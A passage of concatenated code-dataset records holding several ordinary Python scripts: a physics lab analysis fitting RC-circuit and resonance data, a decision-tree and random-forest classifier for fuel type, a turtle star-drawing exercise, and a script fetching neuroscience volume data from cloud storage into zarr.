print(filename)\n # id = int(filename.split(\"_\")[2].split(\".\")[0])\n # values[layer][id] = np.load(filename, allow_pickle=True)\n# print(values.keys())\n np.save(\"./Required_\"+str(layer)+\".npy\", values)","repo_name":"kushagragarwal2443/Brain_decoding_caption_generator","sub_path":"other_codes/files_coco.py","file_name":"files_coco.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28531058385","text":"from Source import *\n\n# load data\ndf = pd.read_csv(\"data/Versuch7_4.csv\")\n# rename columns\ndf.columns = [\"t\", \"V\"]\nrate = get_polling_rate(df)\n\nstd = df[\"V\"].std()\n# %%\n# load data\ndf = pd.read_csv(\"data/Versuch7_5.csv\")\n# rename columns\ndf.columns = [\"t\", \"V1\", \"V2\"]\n\n# plot the data\nfig = plt.figure(figsize=(8, 3))\nplt.scatter(df[\"t\"], df[\"V1\"], label=\"A1\")\nplt.scatter(df[\"t\"], df[\"V2\"], label=\"A2\", s=1)\nplt.xlabel(\"Zeit [s]\")\nplt.ylabel(\"Spannung [V]\")\nplt.xlim(0, 5.2)\nlgnd = plt.legend(loc=\"upper right\")\nlgnd.legendHandles[0]._sizes = [30]\nlgnd.legendHandles[1]._sizes = [30]\nplt.tight_layout()\n# plt.savefig(\"Graphics/test.pdf\", transparent=True)\nplt.show()\n\n\n# %%\n# load data\ndf = pd.read_csv(\"data/Versuch7_1.csv\")\n# rename columns\ndf.columns = [\"t\", \"V\"]\ndf[\"Verr\"] = std\nrate = get_polling_rate(df)\n\nstart, end = 1060, 1260\n\n# pick 5 random numbers between start and end\n# points = np.random.randint(start, end, 10)\npoints = np.array([1060, 1070, 1080, 1090, 1100, 1110, 1140, 1180, 1220, 1300])\n# print(df[\"V\"][points])\n\ndef exp(x, b):\n return 3.*np.exp(-x/b) + 0.00073\n\n# fit exponential to data\npopt, pcov = curve_fit(exp, df[\"t\"][points] - df[\"t\"][start], df[\"V\"][points], p0=[0.02])\nperr = np.sqrt(np.diag(pcov))\n\nR = unc.ufloat(10000, 100, \"R\")\nC = 2.2e-6\ntau = R*C\n\nexptau = unc.ufloat(popt[0], perr[0])\nprint(f\"tau = {tau:.1uS} s: exptau = {exptau:.1uS} s\")\n\n# %%\n# plot data\nfig = plt.figure(figsize=(8, 3))\nplt.scatter(df.t, df.V, s=5, c=\"k\", label=\"Messwerte\")\nplt.plot(df.t, exp(df.t-df[\"t\"][start], *popt), \"r-\", label=\"Fit\")\nplt.scatter(df.t[points], df[\"V\"][points], color=\"red\", label=\"Ausgewählte Messwerte\")\nplt.text(0.35, 0.35, f\"$b = {exptau:.1uS}$ 1/s\", c=\"r\", transform=plt.gca().transAxes, va=\"top\")\nplt.xlabel(\"Zeit [s]\")\nplt.ylabel(\"Spannung [V]\")\nplt.xlim(1.3, 1.8)\nplt.ylim(-0.1, 3.1)\nplt.legend()\nplt.tight_layout()\n# plt.savefig(\"Graphics/Versuch7_1.pdf\", transparent=True)\nplt.show()\n\n# %%\n# plot data with y axis as log scale\nplt.scatter(df.t, df.V, s=5, c=\"k\", label=\"Messwerte\")\nplt.plot(df.t, exp(df.t-df[\"t\"][start], *popt), \"r-\", label=\"Fit\")\nplt.scatter(df.t[points], df[\"V\"][points], color=\"red\", label=\"Ausgewählte Messwerte\")\n# plt.text(0.35, 0.35, f\"$b = {unc.ufloat(popt[1], perr[1]):.1uS}$ \", c=\"r\", transform=plt.gca().transAxes, va=\"top\")\nplt.xlabel(\"Zeit [s]\")\nplt.ylabel(\"Spannung [V]\")\nplt.xlim(1.3, 2.3)\n# plt.ylim(-0.1, 3.1)\nplt.yscale(\"log\", base=2)\n# plt.legend()\nplt.tight_layout()\nplt.show()\n\n# %%\n# load data\ndf = pd.read_csv(\"data/Versuch7_2.csv\")\n# rename columns\ndf.columns = [\"t\", \"V1\", \"V2\"]\ndf[\"Verr\"] = std\nrate = get_polling_rate(df)\n\n# plot data\n# plt.plot(df.t, df.V1, label=\"V1\")\n# plt.plot(df.t, df.V2, label=\"V2\")\n# plt.ylim(-0.1, 3.1)\n# plt.show()\n# %%\ndef fold_data(df, period):\n \"\"\"\n Fold the data at a given period and normalize the time to [0, 1].\n \"\"\"\n tempdf = df.copy()\n tempdf[\"phase\"] = np.fmod(tempdf[\"t\"], period) / period\n return tempdf\ndef shift_phase(df, shift=None, col=None, mode=\"min\"):\n \"\"\"\n Shift the phase by a given amount.\n If no amount is given, shift so that the peak is in the middle.\n \"\"\"\n if col is None:\n RuntimeError(\"No column given.\")\n tempdf = df.copy()\n if shift is None:\n tempdf2 = tempdf.copy()\n # \"bin\" the phase by rounding\n tempdf2[\"phase\"] = np.round(tempdf2[\"phase\"], 3)\n mean = tempdf2[col].mean()\n # only look at data below mean\n if mode == \"min\":\n binnedmax = tempdf2[\"phase\"][tempdf2[col] < mean].value_counts(sort=True)\n # peaklocation is the mean of the phases with the highest count\n peakloc = np.mean(binnedmax[binnedmax == binnedmax.max()].index)\n tempdf[\"phase\"] = np.fmod(tempdf[\"phase\"] - peakloc + 0.5, 1)\n elif mode == \"max\":\n binnedmin = tempdf2[\"phase\"][tempdf2[col] > mean].value_counts(sort=True)\n # peaklocation is the mean of the phases with the highest count\n peakloc = np.mean(binnedmin[binnedmin == binnedmin.max()].index)\n tempdf[\"phase\"] = np.fmod(tempdf[\"phase\"] - peakloc/2 + 0.5, 1)\n else:\n tempdf[\"phase\"] = np.fmod(tempdf[\"phase\"] + shift, 1)\n return tempdf\ndef sine(x, a, b, c):\n return a * np.sin(b * x + c)\ndef sine_fit(x, y, err=None, min=0, p0=None, verbose=False):\n if err is None:\n err = pd.Series(np.ones(len(x)))\n if p0 is None:\n p0 = [1000, 1100]\n start, end = p0[0], p0[1]\n popt, pcov = curve_fit(sine, x.iloc[start:end], y.iloc[start:end], sigma=err.iloc[start:end], absolute_sigma=True, p0=[0.2, 2, 0.5])\n chi = chisq(sine(x.iloc[start:end], *popt), y.iloc[start:end], dof=len(x.iloc[start:end]) - 4)\n if verbose:\n print(f\"start: {start}, end: {end}, chi: {chi}\")\n # increase start and end by 100 as long as chi is smaller than 1\n while chi < 1:\n end += len(x)//30\n if start > min:\n start -= 100\n try:\n popt, pcov = curve_fit(sine, x.iloc[start:end], y.iloc[start:end], sigma=err.iloc[start:end], absolute_sigma=True, p0=[popt[0], popt[1], popt[2]])\n except RuntimeError:\n print(\"RuntimeError\")\n break\n if end > 4*len(x)/5:\n if verbose:\n print(\"end too large\")\n break\n chi = chisq(sine(x.iloc[start:end], *popt), y.iloc[start:end], dof=len(x.iloc[start:end]) - 4)\n if verbose:\n print(f\"start: {start}, end: {end}, chi: {chi}\")\n end -= len(x)//30\n start += 100\n popt, pcov = curve_fit(sine, x.iloc[start:end], y.iloc[start:end], sigma=err.iloc[start:end], absolute_sigma=True, p0=[popt[0], popt[1], popt[2]])\n return popt, pcov\n\ndAmp, dphase = unp.uarray(np.zeros(5), np.zeros(5)), unp.uarray(np.zeros(5), np.zeros(5))\nfor (i, start, freq, shift) in zip([0, 1, 2, 3, 4], [0, 5.5, 11.5, 17.5, 23.5], [1, 3, 7, 10, 20], [0.3, 0.6, 0.7, 0.3, 0.3]):\n df2 = fold_data(df[int(start*rate):int((start+2.5)*rate)], 1/freq)\n df2 = shift_phase(df2, col=\"V2\", shift=shift)\n df2 = df2.sort_values(by=\"phase\")\n df2 = df2.reset_index(drop=True)\n\n # popt1, pcov1 = curve_fit(sine, df2[\"phase\"][df2[\"V1\"] > 0.01], df2[\"V1\"][df2[\"V1\"] > 0.01], p0=[0.2, 2, 0.5])\n # popt2, pcov2 = curve_fit(sine, df2[\"phase\"][df2[\"V2\"] > 0.01], df2[\"V2\"][df2[\"V2\"] > 0.01], p0=[0.2, 2, 0.5])\n popt1, pcov1 = sine_fit(df2[\"phase\"][df2[\"V1\"] > 0.01], df2[\"V1\"][df2[\"V1\"] > 0.01], err=2*df2[\"Verr\"][df2[\"V1\"] > 0.01], p0=[400, 500])\n popt2, pcov2 = sine_fit(df2[\"phase\"][df2[\"V2\"] > 0.01], df2[\"V2\"][df2[\"V2\"] > 0.01], err=2*df2[\"Verr\"][df2[\"V1\"] > 0.01], p0=[400, 500])\n perr1, perr2 = np.sqrt(np.diag(pcov1)), np.sqrt(np.diag(pcov2))\n A1, w1, phi1 = unc.ufloat(popt1[0], perr1[0]), unc.ufloat(popt1[1], perr1[1]), unc.ufloat(popt1[2], perr1[2])\n A2, w2, phi2 = unc.ufloat(popt2[0], perr2[0]), unc.ufloat(popt2[1], perr2[1]), unc.ufloat(popt2[2], perr2[2])\n # print(perr1, popt2)\n\n\n dA = A2/A1\n dPhi = phi2 - phi1\n dAmp[i] = dA\n dphase[i] = dPhi\n max1, max2 = (np.pi/2 - phi1)/w1, (np.pi/2 - phi2)/w2\n print(f\"dAmplitude: {dA:.2uS}, dPhase: {dPhi:.2uS}\")\n\n if i == 2:\n x1 = np.linspace((-popt1[2]-np.arcsin(0.05/popt1[0]))/popt1[1], (np.pi-popt1[2]+np.arcsin(0.05/popt1[0]))/popt1[1], 100)\n x2 = np.linspace((-popt2[2]-np.arcsin(0.05/popt2[0]))/popt2[1], (np.pi-popt2[2]+np.arcsin(0.05/popt2[0]))/popt2[1], 100)\n fig = plt.figure(figsize=(8, 2.88))\n plt.scatter(df2.phase, df2.V2, s=3, label=\"Messdaten U1\", alpha=0.5, zorder=0)\n plt.scatter(df2.phase, df2.V1, s=3, label=\"Messdaten U2\", alpha=0.5, zorder=0)\n plt.hlines(A1.n, 0, 1, color=\"black\", linestyle=\"dashed\", zorder=1)\n plt.hlines(A2.n, 0, 1, color=\"black\", linestyle=\"dashed\", zorder=1)\n # place text between the two lines\n plt.text(0.15, (A1.n + A2.n)/2, fr\"$A1/A2 = {dA:.1uS}$\", horizontalalignment=\"center\", verticalalignment=\"center\")\n plt.vlines(max1.n, 0, 0.2, color=\"black\", linestyle=\"dashed\", zorder=1)\n plt.vlines(max2.n, 0, 0.2, color=\"black\", linestyle=\"dashed\", zorder=1)\n # place text between the two lines\n plt.text((max1.n + max2.n)/2, -0.05, fr\"$\\Delta \\phi = {dPhi/(2*np.pi):.1uS}\\cdot 2\\pi = {dPhi:.1uS}$\", horizontalalignment=\"center\", verticalalignment=\"center\")\n # plt.scatter(df2[\"phase\"][df2[\"V1\"] > 0.1], df2[\"V1\"][df2[\"V1\"] > 0.1], c=\"r\")\n plt.plot(x2, sine(x2, *popt2), label=\"Fit U1\", zorder=0)\n plt.plot(x1, sine(x1, *popt1), label=\"Fit U2\", zorder=0)\n plt.xlabel(\"Phase (f = 7 Hz)\")\n plt.ylabel(\"Spannung [V]\")\n plt.ylim(-0.18, 0.18)\n plt.xlim(0, 1)\n plt.legend(ncol=4, loc=\"lower center\", handlelength=1, markerscale=3, borderaxespad=0.4)\n plt.tight_layout()\n plt.savefig(\"Graphics/Versuch7_2.pdf\", transparent=True)\n plt.show()\n\nfor i in range(4):\n print(f\"{dAmp[i]:.1uS}\", end=\" & \")\nprint(f\"{dAmp[4]:.2uS} \\\\\\\\\")\nfor i in range(4):\n print(f\"{dphase[i]:.2uS}\", end=\" & \")\nprint(f\"{dphase[4]:.1uS} \\\\\\\\\")\n# %%\nfreq = np.array([1, 3, 7, 10, 20])\nwfreq = 2*np.pi*freq\ndAmp = unp.sqrt(dAmp**2-1)/wfreq\ndphase = unp.tan(dphase)/wfreq\n\nfor i in range(4):\n print(f\"{dAmp[i]:.2uS}\", end=\" & \")\nprint(f\"{dAmp[4]:.2uS} \\\\\\\\\")\nfor i in range(4):\n print(f\"{dphase[i]:.2uS}\", end=\" & \")\nprint(f\"{dphase[4]:.1uS} \\\\\\\\\")\n# %%\n# fit const to data\npopt1, pcov1 = curve_fit(const, freq, unp.nominal_values(dAmp), sigma=unp.std_devs(dAmp), absolute_sigma=False)\npopt2, pcov2 = curve_fit(const, freq, unp.nominal_values(dphase), sigma=unp.std_devs(dphase), absolute_sigma=True)\nperr1, perr2 = np.sqrt(np.diag(pcov1)), np.sqrt(np.diag(pcov2))\ntau1, tau2 = unc.ufloat(popt1[0], perr1[0]), unc.ufloat(popt2[0], perr2[0])\nprint(f\"tau1: {tau1:.1uS}, tau2: {tau2:.1uS}\")\n\n# plot dAmp and dphase vs frequency\nplt.errorbar(freq, unp.nominal_values(dAmp), yerr=unp.std_devs(dAmp), fmt=\".\", label=\"Amplitude\")\nplt.errorbar(freq, unp.nominal_values(dphase), yerr=unp.std_devs(dphase), fmt=\".\", label=\"Phase\")\nplt.hlines(popt1[0], 0, 20, color=\"black\", linestyle=\"dashed\")\nplt.fill_between(freq, tau1.n + tau1.s, tau1.n - tau1.s, alpha=0.5)\nplt.hlines(popt2[0], 0, 20, color=\"black\", linestyle=\"dashed\")\nplt.fill_between(freq, tau2.n + tau2.s, tau2.n - tau2.s, alpha=0.5)\nplt.xlabel(\"Frequenz [Hz]\")\nplt.ylabel(\"Spannung [V]\")\nplt.xticks(freq)\nplt.legend()\nplt.tight_layout()\n# plt.savefig()\nplt.show()\n\n# %%\nnewtau = (exptau + tau1 + tau2)/3\n\n# plot all values for tau as gaussian\nx = np.linspace(0.02, 0.03, 1000)\nplt.figure(figsize=(8, 2.5))\n\nplt.plot(x, norm.pdf(x, tau1.n, tau1.s), color=\"black\", label=\"Messdaten\")\nplt.plot(x, norm.pdf(x, tau2.n, tau2.s), color=\"black\")\nplt.plot(x, norm.pdf(x, exptau.n, exptau.s), color=\"black\")\nplt.plot(x, norm.pdf(x, newtau.n, newtau.s), color=\"red\", label=\"Fitwert\")\nplt.fill_between(x, norm.pdf(x, newtau.n, newtau.s), color=\"red\", alpha=0.2, where=(x > newtau.n - newtau.s) & (x < newtau.n + newtau.s), label=r\"$1\\sigma$ Band\")\nplt.vlines(newtau.n, 0, norm.pdf(newtau.n, newtau.n, newtau.s), color=\"red\", linestyle=\"dashed\")\n# label the gaussian\nplt.text(0.54, 0.85, fr\"$\\tau_A$\", transform=plt.gca().transAxes)\nplt.text(0.75, 0.25, fr\"$\\tau_{{\\phi}}$\", transform=plt.gca().transAxes)\nplt.text(0.22, 0.25, fr\"$\\tau_{{cap}}$\", transform=plt.gca().transAxes)\n\nplt.xlabel(r\"$\\tau$ [1/s]\")\nplt.ylabel(r\"Wahrscheinlichkeitsdichte\")\nplt.xlim(0.022, 0.0255)\nplt.legend()\nplt.tight_layout()\nplt.savefig(\"Graphics/Versuch7_6.pdf\", transparent=True)\nplt.show()\n\n\nprint(f\"tau1: {tau1:.1uS}, tau2: {tau2:.1uS}, exptau: {exptau:.1uS}, newtau: {newtau:.1uS}\")\nC = newtau/R\nprint(f\"C: {C:.1uS} \")\n# %%\n# load data\ndf = pd.read_csv(\"data/Versuch7_3.csv\")\n# rename columns\ndf.columns = [\"t\", \"V\"]\ndf[\"Verr\"] = std\nrate = get_polling_rate(df)\n\n# cmap = colors.LinearSegmentedColormap('custom', cdict)\ncmap = sns.color_palette(\"rocket\", as_cmap=True)\n\n# go through 50 data points at a time and write min and max to new dataframe\nmaxdf = pd.DataFrame(columns=[\"t\", \"V\", \"Verr\"])\nfor i in range(0, len(df), 250):\n maxdf = maxdf.append(df.iloc[i:i+250].max(), ignore_index=True)\n\nrand = np.linspace(2.25*rate/250, 9*rate/250, 10, dtype=int)\n# rand = np.linspace(2.25*rate/250, 9*rate/250, 10, dtype=int)\n\nfig, (ax1, ax2) = plt.subplots(2, 1, figsize=(8, 4))\n\nfreqarr = np.empty(len(rand))\n# calculate frequency for rand\nfor i, r in enumerate(rand*250):\n # compute fft, sample rate is 2400 Hz\n yf = ifft(df[\"V\"][r - 208:r + 208].to_numpy())\n # get frequencie of max value\n yf[0] = 0\n freq = fftfreq(len(yf), 1 / rate)[np.argmax(np.abs(yf))]\n freqarr[i] = freq\n # print(f\"Frequency: {freq:.2f} Hz\")\n\n xf = fftfreq(len(yf), 1 / rate)\n ax2.plot(xf, np.abs(yf), c=cmap(i / (len(rand))))\n ax1.axvline(df[\"t\"][r+250], 0, 1.2, linestyle=\"--\", c=cmap(i / (len(rand))))\n ax2.text(freq-20, 0.01+np.abs(yf)[np.argmax(np.abs(yf))], f\"{freq:.0f} Hz\", c=cmap(i / (len(rand))))\n\nax2.set_ylim(0, 0.35)\nax2.set_xlabel(\"Frequenz [Hz]\")\nax2.set_ylabel(\"Amplitude [V]\")\n# plot data\nax1.scatter(df.t[::5], df.V[::5], s=3)\nax1.scatter(maxdf.t, maxdf.V, s=3)\nax1.scatter(maxdf.t[rand], maxdf.V[rand], s=15, c=\"r\")\nax1.set_xlabel(\"Zeit [s]\")\nax1.set_ylabel(\"Spannung [V]\")\nax1.set_xlim(0.5, 11)\nax2.set_xlim(50, 550)\nplt.tight_layout()\n# plt.savefig(\"Graphics/Versuch7_3.pdf\", transparent=True)\nplt.show()\n\n# %%\nR2 = unc.ufloat(10, 0.5)\n# lorentzian fit\ndef lorentzian(x, A, x0, gamma):\n return A / np.pi * gamma / ((x - x0)**2 + gamma**2)\n\n# def gauss(x, A, x0, sigma):\n# return A * np.exp(-(x - x0)**2 / (2 * sigma**2))\n\n# fit lorentzian to data\npopt, pcov = curve_fit(lorentzian, freqarr, unp.nominal_values(maxdf.V[rand])**2/(2*R2.n), p0=[0.1, 300, 1])\nperr = np.sqrt(np.diag(pcov))\n# popt2, pcov2 = curve_fit(gauss, freqarr, unp.nominal_values(maxdf.V[rand]), p0=[1, 300, 10])\n\n# plot amplitude vs frequency\nfig = plt.figure(figsize=(8, 3))\nplt.errorbar(freqarr, unp.nominal_values(maxdf.V[rand])**2/(2*R2.n), yerr=unp.std_devs(maxdf.V[rand])**2/(2*R2.n), fmt=\".k\", label=\"Messdaten\")\nplt.plot(np.linspace(0, 600, 100), lorentzian(np.linspace(0, 600, 100), *popt), label=\"Fit\", c=\"r\")\n# plot peak and fhwd as points\n# plt.scatter(popt[1], lorentzian(popt[1], *popt), label=\"Peak\")\n# plt.scatter(popt[1] + popt[2], lorentzian(popt[1] + popt[2], *popt), label=\"FHWD\")\n# plt.plot(np.linspace(0, 500, 100), gauss(np.linspace(0, 500, 100), *popt2), label=\"Fit\")\nplt.text(0.1, 0.8, fr\"$x_{{0}} = {unc.ufloat(popt[1], perr[1]):.1uS}$ Hz\", transform=plt.gca().transAxes)\nplt.text(0.8, 0.8, fr\"$\\gamma = {unc.ufloat(popt[2], perr[2]):.1uS}$ Hz\", transform=plt.gca().transAxes)\nplt.xlabel(\"Frequenz [Hz]\")\nplt.ylabel(\"Leistung [W]\")\nplt.xlim(0, 600)\nplt.legend(loc=\"lower center\")\nplt.tight_layout()\n# plt.savefig(\"Graphics/Versuch7_4.pdf\", transparent=True)\nplt.show()\n# %%\ndef oscillator(f, X0, f0, gamma):\n return X0 / (np.sqrt((1 - (f / f0)**2)**2 + gamma**2 * (f / f0)**2))\n\n# plot lorentzian with w/w_0 as x axis and amplitude/popt[0] as y axis\npopt1, pcov1 = curve_fit(oscillator, freqarr/popt[1], unp.nominal_values(maxdf.V[rand]), p0=[1, 1, 1])\nperr1 = np.sqrt(np.diag(pcov1))\n\nfig = plt.figure(figsize=(8, 3))\nplt.errorbar(freqarr / popt[1], unp.nominal_values(maxdf.V[rand])/popt1[0], yerr=unp.std_devs(maxdf.V[rand])/popt1[0], fmt=\".\", label=\"Amplitude\")\nplt.plot(np.linspace(0, 2, 100), oscillator(np.linspace(0, 2, 100), *popt1)/popt1[0], label=\"Fit\")\nplt.xlabel(\"Frequenz / Resonanzfrequenz\")\nplt.ylabel(\"Spannung [V]\")\nplt.legend()\nplt.tight_layout()\n# plt.savefig(\"Graphics/Versuch7_5.pdf\", transparent=True)\nplt.show()\n\n# %%\nL = 100e-3\nR2 = unc.ufloat(10, 0.5)\n# C = 2.2e-6\n\nfres = 1 / (2 * np.pi * unp.sqrt(L * C))\nQ = 1/R2 * unp.sqrt(L/C)\nprint(\"expected:\")\nprint(f\"fres: {fres:.1uS} Hz, Q: {Q:.2uS}\")\npeak = unc.ufloat(popt[1], perr[1])\nfhwd = 2*unc.ufloat(popt[2], perr[2])\n# Ppeak = lorentzian(peak, *popt)**2/(2*R2)\n# Pfhwd = lorentzian(peak+fhwd, *popt)**2/(2*R2)\nQ = peak / fhwd\nprint(\"measured:\")\nprint(f\"fres: {peak:.1uS} Hz, Q: {Q:.1uS}\")\n\nLexp = 1 / ((2 * np.pi * peak)**2 * C)\nprint(f\"L: {Lexp:.2uS}\")\n\nRexp = 1/Q * unp.sqrt(L/C)\nprint(f\"R: {Rexp:.1uS}, Rmissing: {Rexp-R2:.1uS}\")\n","repo_name":"alexanderhelbok/Grundpraktikum","sub_path":"Versuch7.py","file_name":"Versuch7.py","file_ext":"py","file_size_in_byte":16182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31626890762","text":"import pandas as pd\nimport sklearn.tree as tree\nimport sklearn.metrics as metric\nimport sklearn.ensemble as ense\nimport graphviz\n\n# Load dataset\ndata = pd.read_csv(\"CO2 Emissions_Canada.csv\")\n\n# Factorize categorical variables\ndata[\"Make\"], _ = pd.factorize(data[\"Make\"])\ndata[\"Model\"], _ = pd.factorize(data[\"Model\"])\ndata[\"Vehicle Class\"], _ = pd.factorize(data[\"Vehicle Class\"])\ndata[\"Transmission\"], _ = pd.factorize(data[\"Transmission\"])\ndata[\"Fuel Type\"], fuel_names = pd.factorize(data[\"Fuel Type\"])\n\n# Split data into train and test sets\npartition = int(len(data) * 0.7) # 70% partition\ntrain_data, test_data = data[:partition].drop(columns=\"Fuel Type\"), data[partition:].drop(columns=\"Fuel Type\")\ntrain_class, test_class = data[:partition][\"Fuel Type\"], data[partition:][\"Fuel Type\"]\n\n# Display fuel type name mapping\nprint(\"Fuel type name mapping:\", fuel_names.values)\n\n# Define error metric functions\ndef mae(true, pred):\n return ((true - pred).abs()).sum() / len(true)\n\n# Define function to display accuracy metrics\ndef display_accuracy(name, true, pred):\n print(\"_________\", name, \"_________\")\n mse = ((true - pred) ** 2).sum() / len(true)\n print(\"MSE:\", mse)\n print(\"MAE:\", mae(true, pred))\n print(\"RMSE:\", mse ** 0.5)\n print(\"Confusion matrix:\")\n matrix = metric.confusion_matrix(true, pred)\n print(matrix)\n print(\"Accuracy for each class:\")\n print(matrix.diagonal() / matrix.sum(axis=1) * 100)\n\n# Build and render decision tree model\ntree_clf = tree.DecisionTreeClassifier(criterion=\"gini\", splitter=\"best\")\ntree_model = tree_clf.fit(train_data, train_class)\ndot_data = tree.export_graphviz(tree_model, out_file=None, feature_names=train_data.columns, class_names=fuel_names, filled=True, rounded=True, special_characters=True)\ngraph = graphviz.Source(dot_data)\ngraph.render(\"tree\")\ndisplay_accuracy(\"Decision Tree (depth=inf)\", test_class, tree_model.predict(test_data))\n\nprint(\"help this is the ending of my lifeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee\")\n\nfor depth in [4, 7, 10, 12]:\n tree_clf = tree.DecisionTreeClassifier(criterion=\"gini\", splitter=\"best\", max_depth=depth)\n tree_model = tree_clf.fit(train_data, train_class)\n display_accuracy(f\"Decision Tree (depth={depth})\", test_class, tree_model.predict(test_data))\n\n\n# Build forest models with n_estimators = 5 and max_depth values ranging from 1 to 12\nmae_min = test_class.max()\ntree_min = 0\nfor i in range(1, 12):\n tree_clf = ense.RandomForestClassifier(n_estimators = 5, max_depth = i)\n tree_model = tree_clf.fit(train_data, train_class)\n MAE = mae(test_class, tree_model.predict(test_data))\n if (MAE < mae_min):\n mae_min = MAE\n tree_min = i\n model_min = tree_model\n\nprint(\"random_forest_best_depth:\", tree_min)\ndisplay_accuracy(\"random_forest_best_depth\", test_class, model_min.predict(test_data))\n\n\n# Build forest models with n_estimators = 3:9 and max_depth value 11\nmae_min = test_class.max()\nfor forest_size in range(3, 9):\n tree_clf = ense.RandomForestClassifier(n_estimators = forest_size, max_depth = 11)\n tree_model = tree_clf.fit(train_data, train_class)\n\n MAE = mae(test_class, tree_model.predict(test_data))\n if (MAE < mae_min):\n mae_min = MAE\n size_min = forest_size\n model_min = tree_model\n\nprint(\"random_forest_best_size:\", size_min)\ndisplay_accuracy(\"random_forest_best_size\", test_class, model_min.predict(test_data))\n","repo_name":"hiropoofs/Data_Science_Decision_Trees","sub_path":"pythonProject/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39169448864","text":"import turtle\r\nimport random\r\n\r\ndef sky(stars,south,north,east,west):\r\n\tturtle.up()\r\n\t\r\n\tturtle.home()\t\t\t\t\t#black backdrop\r\n\tturtle.down()\r\n\tturtle.pencolor(\"black\")\r\n\tturtle.fillcolor(\"black\")\r\n\tturtle.begin_fill()\r\n\tturtle.setheading(north)\r\n\tturtle.forward(250)\r\n\tturtle.right(90)\r\n\tturtle.forward(190)\r\n\tturtle.right(90)\r\n\tturtle.forward(250)\r\n\tturtle.right(190)\r\n\tturtle.end_fill()\r\n\t\r\n\tfor i in range(stars): \t\t\t#star generator\r\n\t\tturtle.up()\r\n\t\tturtle.pencolor(\"white\")\r\n\t\tturtle.fillcolor(\"white\")\r\n\t\tx = random.randint(0,190)\r\n\t\ty = random.randint(0,250)\r\n\t\tturtle.setpos(x,y)\r\n\t\tturtle.down()\r\n\t\tturtle.begin_fill()\r\n\t\tturtle.circle(0.5)\r\n\t\tturtle.end_fill()\r\n\t\tturtle.up()","repo_name":"unown294/Python-UTA-","sub_path":"Homework_2_Redman/stars.py","file_name":"stars.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42139160509","text":"import cloudvolume\n# import daisy\nimport json\nimport logging\nimport numpy as np\nimport os\nimport sys\n\nlogging.basicConfig(level=logging.INFO)\n\ndef world_to_vox(offset,voxel_size):\n\n return [int(i/j) for i,j in zip(offset, voxel_size)]\n\ndef cloud_to_zarr_coords(coords, voxel_size):\n\n return [int(i*j) for i,j in zip(coords, voxel_size)][::-1]\n\ndef fetch_in_block(\n block,\n voxel_size,\n raw_data,\n out_ds):\n\n logging.info('Fetching raw in block %s' %block.read_roi)\n\n voxel_size = list(voxel_size)\n\n block_start = list(block.write_roi.get_begin())\n block_end = list(block.write_roi.get_end())\n\n block_start = world_to_vox(block_start,voxel_size)\n block_end = world_to_vox(block_end,voxel_size)\n\n z_start, z_end = block_start[0], block_end[0]\n y_start, y_end = block_start[1], block_end[1]\n x_start, x_end = block_start[2], block_end[2]\n\n raw = raw_data[x_start:x_end, y_start:y_end, z_start:z_end]\n\n raw = np.array(np.transpose(raw))\n\n raw = raw[2:3]\n\n raw = raw >= 128\n\n raw = raw[0]\n\n out_ds[block.write_roi] = raw\n\ndef get_cloud_roi(cloud_vol):\n\n info = cloud_vol.info\n\n roi_offset = info.voxel_offset\n roi_shape = info['scales'][0].size\n\n return roi_offset, roi_shape\n\ndef fetch(\n in_vol,\n voxel_size,\n roi_offset,\n roi_shape,\n out_file,\n out_ds,\n num_workers):\n\n # raw_vol = cloudvolume.CloudVolume(\n # in_vol,\n # bounded=True,\n # progress=True)\n\n # info = raw_vol.info\n\n # for scale in info['scales']:\n # if not scale['voxel_offset']:\n # scale['voxel_offset'] = [0,0,0]\n\n # raw_vol.info = info\n\n total_roi = daisy.Roi((roi_offset), (roi_shape))\n\n read_roi = daisy.Roi((0, 0, 0), (5040, 5040, 5040))\n write_roi = read_roi\n\n logging.info('Creating out dataset...')\n\n raw_out = daisy.prepare_ds(\n out_file,\n out_ds,\n total_roi,\n voxel_size,\n dtype=np.uint8,\n write_roi=write_roi)\n\n logging.info('Writing to dataset...')\n\n daisy.run_blockwise(\n total_roi,\n read_roi,\n write_roi,\n process_function=lambda b: fetch_in_block(\n b,\n voxel_size,\n in_vol,\n raw_out),\n fit='shrink',\n num_workers=num_workers)\n\nif __name__ == '__main__':\n\n # in_vol = \"https://storage.googleapis.com/j0126-nature-methods-data/GgwKmcKgrcoNxJccKuGIzRnQqfit9hnfK1ctZzNbnuU/rawdata_realigned\"\n\n # in_vol = \"https://storage.googleapis.com/j0126-nature-methods-data/GgwKmcKgrcoNxJccKuGIzRnQqfit9hnfK1ctZzNbnuU/ffn_segmentation\"\n\n in_vol =\"https://storage.googleapis.com/j0126-nature-methods-data/GgwKmcKgrcoNxJccKuGIzRnQqfit9hnfK1ctZzNbnuU/tissue_classification\"\n\n raw_vol = cloudvolume.CloudVolume(\n in_vol,\n bounded=True,\n progress=True,\n fill_missing=True)\n\n info = raw_vol.info\n\n # print(info)\n\n for scale in info['scales']:\n scale['voxel_offset'] = [0, 0, 0]\n\n raw_vol.info = info\n\n print(raw_vol.info)\n\n size = raw_vol.info['scales'][0]['size'][::-1]\n print(size)\n\n # voxel_size = daisy.Coordinate((20,18,18))\n # roi_offset = [0, 0, 0]\n # roi_shape = [114000, 97920, 95616]\n # roi_shape = [i*j for i,j in zip(size, [20,18,18])]\n # roi_shape = [10000, 9990, 9990]\n\n # print(roi_shape)\n\n # out_file = sys.argv[1]\n # out_ds = 'volumes/ffn_cell_body_mask'\n\n # fetch(\n # raw_vol,\n # voxel_size,\n # roi_offset,\n # roi_shape,\n # out_file,\n # out_ds,\n # num_workers=32)\n\n","repo_name":"funkelab/lsd_experiments","sub_path":"scripts/data_consolidation/cloud_to_zarr_mask.py","file_name":"cloud_to_zarr_mask.py","file_ext":"py","file_size_in_byte":3714,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41332633951","text":"import numpy as np\n\n\ndef calculate(list):\n if len(list) != 9:\n raise ValueError(\"List must 